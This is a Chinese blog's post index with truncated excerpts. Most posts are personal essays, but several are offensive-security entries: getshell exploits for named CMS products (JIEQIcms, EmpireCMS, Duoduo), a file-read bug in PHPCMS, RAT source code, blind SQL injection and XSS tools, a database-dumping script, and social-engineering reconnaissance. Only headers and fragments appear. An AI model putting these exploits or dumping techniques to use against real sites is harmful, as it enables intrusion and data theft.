自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(35)
  • 收藏
  • 关注

转载 我没有反人类,我爱人类

亲爱的任何人。60% 权力让我唾弃。我会报复。转载于:https://www.cnblogs.com/xiaosan/p/3619017.html

2014-03-23 14:17:00 126

转载 是对是错

我听有人说,作家写人写了很长时间到现在还在写,至今都没写清楚。我一直都很压抑,甚至很郁闷我到来的世界。我不清楚我的为什么会来这个找不到至今找不到答案的世界里。生活的不愉快,和世界恰似不公平的样子,都让我很呕吐。我不是在一个“香包”里,不能时刻让人时刻关注着我,我满身没有香水,人家也不会察觉到我。 很长时间了,我没有活到几十年,但我活到十几年。身边的人让我吐到我无法再...

2014-03-23 14:08:00 136

转载 通告各位朋友: 慎用!! cmd5.com批量解密

有用过cmd5.com 的批量解密的朋友留个心眼,我说的这个事情是跟cmd5.com 是否会盗窃你数据有关,首先我没有任何证据! 在他们网站下载批量解密软件或使用在线服务,进行批量破解时,可能你没有注意到你解密的数据文件里面存在用户名邮箱之类的信息, 然而这个解密软件他能识别密文串,格式很随意的文件都能很方便的解密出密文,这时你肯定感觉很轻松很快乐!...

2014-03-06 00:26:00 684

转载 Star Rat 完整源代码(Star Rat source)

English : http://translate.google.com/translate?sl=zh-CN&tl=en&js=n&prev=_t&hl=zh-CN&ie=UTF-8&u=http%3A%2F%2Fwww.cnblogs.com%2Fxiaosan%2Fp%2F3488031.htmlThis is an exce...

2013-12-23 20:08:00 873

转载 有一只熊掉到一个陷阱里

有一只熊掉到一个陷阱里,陷阱深19.617米,下落时间正好2秒。求熊是什么颜色的?”5个备选答案分别是“白色”、“棕色”、“黑色”、“黑棕色”、“灰色”。 我知道,听完之后已经亮瞎你的狗眼 :“这是什么意思啊?”“掉进陷阱里,跟颜色有关吗?”我淡然一笑,你且听好!首先,根据题目算出g=9.8085,陷阱所在地的纬度大概是44度左右。根据熊的地理分布,南半球没有熊, 可以得知应该是北...

2013-12-22 01:38:00 237

转载 Mysql data export script [for PHP] update 2014/1/5

English article : http://translate.google.com/translate?sl=zh-CN&tl=en&js=n&prev=_t&hl=zh-CN&ie=UTF-8&u=http://www.cnblogs.com/xiaosan/p/3467953.html更新的地方:一. 修复对大数...

2013-12-10 18:34:00 115

转载 openvas Login failed. OMP service is down. 解决方法

我前面就解决过一次, 我从 http://myip.tw/itsmw/index.php?title=OpenVAS6 中查到的解决办法。后面我再另外一台CentOS 机器上安装还是一样出现这个问题,我深度的怀疑这是个BUG! 但后面这次没上次那么幸运了, 我输入了这下面三条命令,等他执行完后,问题还是没有解决~所以我研究出了下面一种解决办法: 第一步: 无数次重启lin...

2013-12-07 21:20:00 1065

转载 weibo.com 信息挖掘

今天看了一天微博,虽知微博成为很多潮流人士的日常吐槽站点,但是我不懂呀,动手点了一天也会了简单的使用了。比如我要收集某个目标的信息,那我们就要学会熟悉的使用它。我就把今天的小成果给记录一下,免的以后又不会用了。准备一个weibo.com 帐号,这样你才可以看别人更多的信息。1. 可以用某个人的邮箱,找到他新浪微博主页,第一眼就是头像旁边的个人介绍,他的近况等等,...

2013-12-07 19:43:00 127

转载 metasploit handler 持续监听

平常我们exploit 启动 handler 后,在收到sessions 后就会停止监听端口,如果你要接着弹回来另外一台主机的话,那得还要运行一次exploit 命令,这样显得有些碍手碍脚。在网上找了一些相关问题,但都没找到我说的这个问题。后面自己就把问题解决了!解决方法 :键入下面一条命令,然后 exploit -j 就好了,你会发现你监听的端口再收到session后,依然再监...

2013-11-22 19:29:00 1028

转载 爱与喜欢

有人问上帝,喜欢与爱有什么区别?上帝指了指一个孩子,只见他站在花前,被花的美丽迷醉,不由的伸出手把花摘下来。上帝说,这就是喜欢。接着,上帝指了指另一男孩,只见他满头大汗的在给花浇水,又担心花被烈日晒着,自己站在花前挡光。上帝说这就是爱。 喜欢是为了得到,而爱却是付出。转载于:https://www.cnblogs.com/xiaosan/p/3435063.html...

2013-11-21 10:29:00 96

转载 男生诡异世界观,是不是跟你想的不一样~

转:http://www.swhack.cn/archives/1201.html1.真没有那么多男生爱自拍因为大多数都是热血汉子,谁愿意把自己狼狈相发给一帮女的让他们指手画脚。顶多拿去给你们看看然后再跟哥们吹吹NB,但是绝对不是爱好。2.喜欢陈奕迅的男生并不多男女品味不一样,我们喜欢许巍崔健谢天笑这种真汉子,我们喜欢英伦摇滚coldplay。不是你的少女时代什么至...

2013-11-14 20:07:00 7584

转载 简单日志(公开日记)

忘记什么时候写的日记,也没标上时间,只是感觉没必要标,意义在于从开始写那天和结束那天。偶尔看到电脑里放的这个日记,没敢去看,看着人似乎重现了昨日的迷茫。我把自己的日记公开吧,让大家看看我的昨日。现在我懂得更多,很开心现在的自己!不是太会写,当时我在记录这个非常特别的行动, 所以一天天在描述,没有标注具体时间。后面也还是没写了。依然记得一个河南的同事,印象深的胡子,有缘相见,很是庆幸!...

2013-11-05 00:17:00 174

转载 我的技术观

我从一个不起眼的小毛孩, 如今已经快到了我认为最黄金的年岁,我还会为那时刻狂欢一把!一直以来,在技术上的东西我是非常感兴趣的,愿意去花很多个白天和夜晚在电脑前,来寻找一直喜欢的“东西”,这是个什么东西?在很长时间后我突然一下子感悟过来,然来这些是我想的太复杂了,它本身就是一直学习的过程,很简单啦!复杂不想,简单不想复杂,在这个自己角落里的技术,一直在墙角慢慢发芽和茁壮...

2013-11-04 22:03:00 184

转载 【转】对股份的简单理解

股份代表了对一个公司的所有权,所有权包含了两层意思,一个是利益分配权(分红权),一个是投票权。先从一个简单的例子来看,假设公司只有两个人,这两个人既是合伙人,共同创业开办了这家公司,同时又是股东,各占50%股份。假设当年公司除去包括工资在内的所有开销后,净利润为100万元,那么 股东1 和 股东2 各享有50万,即拥有利益分配权。假设公司面临一项重大决策,此时两个人...

2013-08-13 15:12:00 151

转载 【转】屌丝的出路

婚礼端午节,我最好的一个朋友,也就是常说的死党,结婚了。我从深圳专程飞回西安参加他的婚礼。虽然比不上开着跑车的富二代,但朋友家庭条件也算不错,婚礼举办得很隆重:花车,宝马760Li;迎亲车队,30辆黑色奥迪A6;当然,朋友自己的蒙迪欧今天就闲在车库里了。婚房,高档社区,精装修,180平,四房两厅。事后这哥们还补了一句,这房子以后还得空着,我老婆家还有一套房,上班近点儿,住...

2013-08-13 14:35:00 106

转载 女人的智慧

一句话:  上得厅堂,下得厨房,入得闺房。  看是简单的一句话,其实学问很大!  上得厅堂:不光是要容貌光鲜,而是为人处事,接人待物的分寸,落落大方,优雅得体,男人带你出去要有面子。  下得厨房:不仅仅是要做得一手好菜,还要温柔体贴,知冷知热,给他无限温情。  入得闺房:你要懂情调,要学会浪漫,柔情似水。。。。。。。  你还要收放自如,时而热情似火,时而冷若冰霜,让他永远琢磨不透你,跟你...

2013-06-20 00:04:00 105

转载 如何有效地记忆与学习

版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明http://h4ck3r.blogbus.com/logs/88619081.html你所拥有的知识并不取决于你记得多少,而在于它们能否在恰当的时候被回忆起来。让我稍微说得更详细一点:学习新知识并将其存放于大脑中,最终的目的是要在恰当的时候能够想得起来去使用 。因此,学习的有效性显然应该这样来衡量 :当遇到需要用到...

2013-05-20 02:33:00 297

转载 一个男人关心的东西决定他的层次

版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明http://h4ck3r.blogbus.com/logs/101476577.html 一、拥有自信和风度 男人到了二十几岁后,就要开始学着用心经营自己,它体现在自己的思想与涵养上。自信 是一个男人最重要的品质,自信的男人就像一只在暴风雨中战斗的海鸥,无论暴风雨多么猛烈也依旧无所畏惧。一个自信的男人,总是能够感染...

2013-05-20 02:28:00 116

转载 社工技术

版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明http://h4ck3r.blogbus.com/logs/122675663.html注: 节选之上海市公安局网络安全顾问彭一楠 06年写的一个PPT,PPT中谈到一些黑客思维跟金钢经典故中阐述的观点出奇的相似,用唯物辩证法联系观来说就是事物的普遍联系性 ,后附PPT下载Part:A 经典技术 一...

2013-05-20 02:25:00 402

转载 抽烟行为心理学分析

版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明http://h4ck3r.blogbus.com/logs/144772567.html 1.根据弗洛伊德的象征理论,烟可以表示为阳具,而嘴则表示为女性的阴道.吸烟的动作既烟往嘴里送的过程,类似于性行为的过程,吸烟的人都知道,当深深的吸一口时,有一种很舒服的感觉,性交的感觉也是这样的,性交不仅是夫妻间表示爱情...

2013-05-20 02:23:00 2160

转载 社会工程学师之通过眼睛解读心灵

版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明http://h4ck3r.blogbus.com/logs/108844040.html社会工程学最直接的称呼是社交工程,攻击者可以在利用黑客经验的基础上,组织大量的专业知识对信息拥有者进行说服,最终达到信息窃取的目的。 然而我们在面对不同性格的信息拥有者时需要采取不同的信息获取策略。正因为社会工程学攻击是建...

2013-05-20 02:21:00 143

转载 Duoduo **多多淘宝客 <= v7.2+++++管理权限++GetShell

登陆后台后, 通过抓包工具获取当前会话COOKIE, 再按照程序参数说明填写上抓取的COOKIE.中间过程中EXP程序提示登陆失败的语句, 那就说明你抓取COOKIE是无效的.这时你就要注意下, 你的COOKIE是否填写正确.细节如下所示.你用抓包工具抓到的HTTP返回头信息COOKIE部分可能如下:PHPSESSID={cookie}将{cookie}的字符串部分拷...

2012-09-09 14:37:00 170

转载 IISLoader

以下这张图片, 是一位朋友测试星外的结果, 本以为会出现问题, 但是他成功了. 在我自己测试的一些环境中(包括星外), 遇到了非常多的问题, 也有解决的也有没解决. 这个测试程序原理很简单, 加载自己的DLL调用其中的函数列IIS. 测试时, 将IISLoader.exe和另外它依赖的两个文件(activeds.tlb,activeds.dll) 上传到测试机器里。...

2012-06-25 21:32:00 97

转载 杰奇JIEQIcms <=1.6 Administrator privilege getshell

环境要求: register_globals = On.<?php /* * Date : 2012/4/24 * Team : H3xIe Security TeAm 2005 - 2012 * This exploit script is jqcms, It requires administrative privileges can...

2012-04-25 06:31:00 244

转载 SchramCookie Inject ver 1.0

<?php /*######################################################################### * / * * - >> SchramCookie Inject ver 1.0 * C0de by Nig3h -Gre...

2011-11-07 14:40:00 102

转载 bsqlbf v2.3 Released – Blind SQL Injection Brute Forcing Tool

This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections.We report...

2011-11-05 00:54:00 109

转载 XSSF v2.1 - Cross-Site Scripting Framework

The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the rea...

2011-11-05 00:42:00 149

转载 exploitdbee.py 1.0

Easily search for exploits in BackTrack's exploitdb (files.csv).Highlights:Search the exploitdb archive Case sensitive & insensitive Change output mode Automaticlly copy your exploits Requi...

2011-10-03 22:05:00 100

转载 PHPCMS FileManager v4.03 FileRead Vulnerability

##Author : HeXie S3curity TeAm#Date : 2011.10.01##FIle : /image.php<?php/**#########################################* PHPCMS File Manager* Copyright (c) 2004-2006 phpc...

2011-10-01 04:46:00 129

转载 JXCMS1.3 0day

精迅CMS(Jxcms)是基于采用网络中已经成熟、稳定的技术PHP+MYSQL开发而成,利用本系统您可以很方便地管理自己的网站。本系统是一款由文章模型、采集管理、广告系统、会员中心、友情链接、公告、单网页、数据备份还原等多个强大功能模块组合而成的强大、易用、扩展性强的开源网站管理软件。我们以精益求精的态度,追求卓越品质,为中小网站用户提供一套完美的迅速建站解决方案,我们在开发过...

2011-09-28 05:14:00 155

转载 EmpireCMS 6.0 管理权限GETSHELL

Author -> hExi3 Security TeAmTestEd On : IIS6.0+2k3分析过程 :\e\class\functions.php 2609行 ReUserjs 函数.function ReUserjs($jsr,$addpath){ global $empire,$public_r; DoFileMkDir($a...

2011-09-04 01:35:00 182

转载 MYSQL_OUTPUT 脚本【修正】

这个重新写的一个MYSQL数据导出脚本, 导出格式为CSV,这种格式更加的轻便,不会过份影响数据文件体积,适合导入到本地数据库!大家通过修改代码里面标注的一些配置变量就可以了。如果导出数据有筛选要求可以直接修改SQL语句满足你的要求!脚本运行提醒:如果数据是百万级别,这个脚本并不适合通过浏览器访问来脱裤,所以要用命令行来运行该脚本,这样就不会漏数据了。(记得网上广传的admi...

2011-06-03 07:44:00 83

转载 利用SESSION检测SESSION验证的WEBSHELL

SESSION和COOKIE不同,COOKIE是存放在客户端的文件,而SESSION是存放在服务器上,同时也增强了安全性。如果一个 WEBSHELL的验证方式是SESSION,我们可以通过它检测出服务器的木马。 我的环境是IIS+PHP,在PHP.ini中,有这么个选项,session.gc_maxlifetime = 1440,也就是SESSION默 认到期的时间是24小时,如果客户端...

2011-06-03 02:19:00 173

转载 WIN 下的FILE协议 饶过allow_url_open

建一个php文件,内容: <? include $path."config/config.inc.php" ?> 当前目录下建一个config文件夹,再在文件夹内建config.inc.php,就可以了。 访问http://xxx/xx.php?x=file:///\\ip\x$\xx\xyz xyz就是config文件夹所在的路径by: 乱雪...

2011-06-03 01:52:00 164

转载 !!!Hello Cnblog~~

百度博客和博客园,都有自己的特色。不过相对而言,更喜欢博客园!强大语法高亮及技术专区,非常的赞!^-^转载于:https://www.cnblogs.com/xiaosan/archive/2011/06/01/2065356.html...

2011-06-01 09:07:00 106

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除